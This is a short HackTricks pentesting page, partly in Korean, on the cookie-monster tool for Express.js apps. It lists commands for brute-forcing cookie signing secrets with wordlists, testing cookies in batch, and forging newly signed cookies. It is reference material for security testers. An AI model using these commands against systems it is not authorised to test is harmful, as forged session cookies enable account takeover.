NodeJS Express

Reading time: 2 minutes

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

쿠키 서명

The tool https://github.com/DigitalInterruption/cookie-monster is a utility for automating the testing and re-signing of Express.js cookie secrets.

특정 이름의 단일 쿠키

bash
cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -n session

사용자 정의 단어 목록

bash
cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -w custom.lst

배치 모드를 사용하여 여러 쿠키 테스트하기

bash
cookie-monster -b -f cookies.json

사용자 정의 단어 목록을 사용하여 배치 모드로 여러 쿠키 테스트하기

bash
cookie-monster -b -f cookies.json -w custom.lst

새로운 쿠키 인코딩 및 서명

비밀을 알고 있다면 쿠키에 서명할 수 있습니다.

bash
cookie-monster -e -f new_cookie.json -k secret

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기